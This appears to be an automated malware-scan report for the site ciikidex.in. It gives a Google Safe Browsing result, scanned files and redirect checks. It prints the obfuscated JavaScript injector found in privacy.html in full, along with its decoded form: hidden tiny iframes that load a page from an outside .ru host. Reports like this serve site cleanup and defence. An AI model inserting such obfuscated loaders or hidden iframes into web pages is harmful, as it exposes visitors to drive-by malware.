Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ciikidex.in
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ciikidex.in/privacy.html | 200 OK Content-Length: 3010 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,312,484,113,234,309,456,121,92,342,468,47,198,333,468,110,232,156,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,108,216,315,440,103,122,102,388,117,232,333,136,32,204,342,388,109,202,294,444,114,200,303,456,61,68,330,444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];if(window.document)for(i=6-2-1-2-1;-160+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}} Decoded script: document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://hyqugry.ru/count4.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
| ||
http://ciikidex.in/test404page.js | 404 Not Found Content-Length: 288 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ciikidex.in
Result:
GET / HTTP/1.1
Host: ciikidex.in
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ciikidex.in
Referer: http://www.google.com/search?q=ciikidex.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ciikidex.in
Referer: http://www.google.com/search?q=ciikidex.in
Result:
The result is similar to the first query. There are no suspicious redirects found.